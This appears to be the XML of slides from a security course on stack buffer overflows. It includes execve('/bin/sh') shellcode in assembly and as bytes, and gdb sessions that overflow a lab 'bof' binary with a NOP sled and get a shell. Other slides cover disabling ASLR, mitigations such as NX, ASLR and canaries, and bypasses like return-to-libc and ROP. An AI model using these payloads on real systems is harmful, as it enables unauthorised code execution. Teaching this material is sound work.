          <p:cNvPr id="1328" name="Shape 1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050" y="3372350"/>
            <a:ext cx="3758851" cy="16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shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1334" name="Shape 1334"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204825" y="1194850"/>
            <a:ext cx="65547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080483db &lt;shellcode&gt;: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80483db:       55              push   %ebp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80483dc:       89 e5           mov    %esp,%ebp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80483de:       31 c0           xor    %eax,%eax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80483e0:       50              push   %eax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80483e1:       68 2f 2f 73 68  push   $0x68732f2f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80483e6:       68 2f 62 69 6e  push   $0x6e69622f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80483eb:       89 e3           mov    %esp,%ebx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80483ed:       50              push   %eax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80483ee:       53              push   %ebx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80483ef:       89 e1           mov    %esp,%ecx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80483f1:       99              cltd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80483f2:       b0 0b           mov    $0xb,%al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80483f4:       cd 80           int    $0x80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80483f6:       90              nop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80483f7:       5d              pop    %ebp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80483f8:       c3              ret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5" name="Shape 1335"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318625" y="1945875"/>
            <a:ext cx="4961400" cy="227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Shape 1336"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5507650" y="1866225"/>
            <a:ext cx="3379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SHELLCODE = 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\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"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your first stack overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1342" name="Shape 1342"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3914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cat </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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/proc/sys/kernel/randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr b="1"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gdb -q --args ./bof $(python -c 'print </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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"A" * 140 + "BBBB"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Reading symbols from ./bof...(no debugging symbols found)...done.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r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Starting program: /home/user/Challenges/bof/bof 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argv[1]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB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Program received signal SIGSEGV, Segmentation fault.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0x42424242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in ?? ()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x/20x $esp - 160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0xffffd4a0:     0x080485c0      0xffffd4b0      0x000000c2      0xf7e9562b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0xffffd4b0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:     0x41414141      0x41414141      0x41414141      0x41414141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0xffffd4c0:     0x41414141      0x41414141      0x41414141      0x41414141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0xffffd4d0:     0x41414141      0x41414141      0x41414141      0x41414141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0xffffd4e0:     0x41414141      0x41414141      0x41414141      0x41414141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3" name="Shape 1343"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5063875" y="1152475"/>
            <a:ext cx="1797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4CCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disable ASLR</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"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shell in gdb</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1349" name="Shape 1349"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="384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user@ubuntu:~/Challenges/bof$ gdb -q --args ./bof $(python -c 'print </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "A" * (140 - 24)+ "\xb0\xd4\xff\xff"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Reading symbols from ./bof...(no debugging symbols found)...done.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(gdb) r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Starting program: /home/user/Challenges/bof/bof 1�Ph//shh/bin�S�ᙰ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6383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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��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argv[1]: 1�Ph//shh/bin�S�ᙰ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6383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̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��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process 54169 is executing new program: /bin/dash</a:t>
            </a:r>
            <a:endParaRPr b="1"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id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uid=1000(user) gid=1000(user) groups=1000(user),27(sudo)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shell outside gdb</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1355" name="Shape 1355"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="384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./bof $(python -c 'print </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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"\x90" * 60 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "A" * (140 - 60 - 24)+ "\xea\xd4\xff\xff"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argv[1]:������������������������������������������������������������1�Ph//shh/bin�S�ᙰ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6383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                AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��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id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uid=1000(user) gid=1000(user) groups=1000(user),27(sudo)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6" name="Shape 1356"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870425" y="1152475"/>
            <a:ext cx="1797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4CCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOP Sled</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"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mitigations in Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1362" name="Shape 13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is not executable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NX/W^X/DEP</a:t>
            </a:r>
            <a:endParaRPr sz="18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implemented with hardware support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disabled for emulators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Randomize shellcode(stack) address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ASLR</a:t>
            </a:r>
            <a:endParaRPr sz="18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/proc/sys/kernel/randomize_va_space, 0, 1, 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stack overflow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Stack Canary/Cookie</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/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-fno-stack-protector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Space Layout Randomization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1368" name="Shape 1368"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="85206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ASLR(Pax Research Group)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randomize user stack(2001)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randomize kernel stack(2002)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randomize heap(2003)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Bypass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Return to PLT(2001), bypass shared library randomization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Brute force on x86_32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memory addresses are randomized at page level - 0x1000 bytes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Info leak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Long nop sled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Heap spray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local trick: ulimit -s unlimited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Shape 13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Protection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1374" name="Shape 1374"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4071500" y="1221650"/>
            <a:ext cx="3894975" cy="3551150"/>
            <a:chOff x="3771275" y="1085100"/>
            <a:chExt cx="3894975" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1375" name="Shape 1375"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1212775"/>
              <a:ext cx="1363200" cy="2742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For Kernel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897550" y="1486975"/>
              <a:ext cx="1363200" cy="27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Stack</a:t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4897550" y="1761175"/>
              <a:ext cx="1363200" cy="603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4897550" y="2365075"/>
              <a:ext cx="1363200" cy="44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shared libraries</a:t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4897550" y="2807875"/>
              <a:ext cx="1363200" cy="603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4897550" y="3411775"/>
              <a:ext cx="1363200" cy="274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Heap</a:t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4897550" y="3685975"/>
              <a:ext cx="1363200" cy="274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</a:t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4897550" y="3960175"/>
              <a:ext cx="1363200" cy="27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Text</a:t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4897550" y="4234375"/>
              <a:ext cx="1363200" cy="2742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Unused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384" name="Shape 1384"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="1377" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5579150" y="1761175"/>
              <a:ext cx="0" cy="36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5" name="Shape 1385"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="1380" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5579150" y="3077575"/>
              <a:ext cx="0" cy="33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86" name="Shape 1386"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="1085100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0xFFFFFFFF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6619250" y="1359300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0xC0000000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6619250" y="2674225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0x40000000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6619250" y="4058550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0x08048000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90" name="Shape 1390"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1218750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1" name="Shape 1391"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1492950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2" name="Shape 1392"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="2807875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3" name="Shape 1393"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4221500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4" name="Shape 1394"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4495700"/>
              <a:ext cx="3585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5" name="Shape 1395"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4362050"/>
              <a:ext cx="1047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0x00000000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3771275" y="1633500"/>
              <a:ext cx="641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%esp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97" name="Shape 1397"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="48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98" name="Shape 1398"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836300" y="1547600"/>
            <a:ext cx="3311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Writable, Readable, Non-Executable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99" name="Shape 1399"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836300" y="3577600"/>
            <a:ext cx="3311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Writable, Readable, Non-Executable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00" name="Shape 1400"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836300" y="4283500"/>
            <a:ext cx="3311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Readable, Executable, Not Writable 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401" name="Shape 1401"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1398" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4147700" y="1786550"/>
            <a:ext cx="1029900" cy="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Shape 1402"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1382" idx="1"/>
            <a:endCxn id="1400" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4147775" y="4233825"/>
            <a:ext cx="1050000" cy="29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3" name="Shape 1403"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4915900" y="3686925"/>
            <a:ext cx="147900" cy="33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4" name="Shape 1404"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1403" idx="1"/>
            <a:endCxn id="1399" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4147600" y="3822225"/>
            <a:ext cx="768300" cy="2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NX/W^X/DEP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1410" name="Shape 14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Linux patch by Alexander(1997):protact stack only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Pax Research Group proposes W^X(2000):more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fine-grained protection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RedHat Linux ExecShield, Windows DEP(2004)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Bypassed by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Return-to-libc/ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(code reuse attack)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to Libc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1416" name="Shape 1416"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1687025" y="186620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**argv</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1417" name="Shape 1417"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1687025" y="2173400"/>
            <a:ext cx="1571400" cy="30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argc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1418" name="Shape 1418"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1687025" y="248060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 addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1419" name="Shape 1419"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1687025" y="278780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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1420" name="Shape 1420"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1687025" y="3095000"/>
            <a:ext cx="1571400" cy="122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nop sled</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1421" name="Shape 1421"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1418" idx="3"/>
            <a:endCxn id="1420" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3258425" y="2634200"/>
            <a:ext cx="600" cy="10710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2" name="Shape 1422"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1405550" y="2514900"/>
            <a:ext cx="0" cy="179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3" name="Shape 1423"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="853450" y="3083825"/>
            <a:ext cx="7453800" cy="2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24" name="Shape 1424"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404200" y="2707075"/>
            <a:ext cx="887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1425" name="Shape 1425"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="18705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"/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1426" name="Shape 1426"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="21777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sp>
        <p:nvSpPr>
          <p:cNvPr id="1427" name="Shape 1427"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="24849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428" name="Shape 1428"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="27921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429" name="Shape 1429"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="3099350"/>
            <a:ext cx="1571400" cy="122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430" name="Shape 1430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329875" y="1563350"/>
            <a:ext cx="1571400" cy="307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31" name="Shape 1431"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3964600" y="2484950"/>
            <a:ext cx="962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</p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1432" name="Shape 1432"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1431" idx="3"/>
            <a:endCxn id="1427" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926700" y="2638550"/>
            <a:ext cx="4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3" name="Shape 1433"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1431" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3525700" y="2638550"/>
            <a:ext cx="438900" cy="1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4" name="Shape 1434"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7103550" y="1581900"/>
            <a:ext cx="15900" cy="273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5" name="Shape 1435"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7177375" y="2707075"/>
            <a:ext cx="887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1436" name="Shape 1436"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7177375" y="1520550"/>
            <a:ext cx="1872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system("/bin/sh")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exit(0)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7" name="Shape 1437"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236500" y="1708800"/>
            <a:ext cx="1223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address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1438" name="Shape 1438"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236500" y="4012250"/>
            <a:ext cx="1223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address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